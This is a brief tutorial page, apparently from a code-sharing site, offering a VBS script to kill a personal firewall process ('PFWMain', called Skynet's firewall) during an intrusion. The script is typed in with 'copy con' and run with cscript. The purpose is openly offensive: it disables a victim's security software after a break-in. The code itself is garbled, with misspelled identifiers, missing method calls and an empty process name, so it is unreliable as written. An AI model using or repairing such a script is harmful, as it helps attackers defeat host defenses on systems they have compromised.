SoFunction
Updated on 2025-04-09

Code to kill firewall process during intrusion

Write a VBS script:
Enter:
copy con  (Note to novices: there is no command prompt after executing this line)
CODEstrComputer = "." 
Set objWMIServive = GetObject("winmagmts:" _  
& "{impersonationLevel=impcrsonatc}!\\" &strComputer & "\root\cimv2" 
Set colProcesslist =  _ 
("select * from Win32 Process Where Name = ''" 
For Each objPrecess in colProcessList 
() 
Next 

'PFWMain' is Skynet's firewall, you can change it yourself
After entering, press "CTRL"+"z" at the same time, and the command prompt will come out again.
Then it's executed:
csript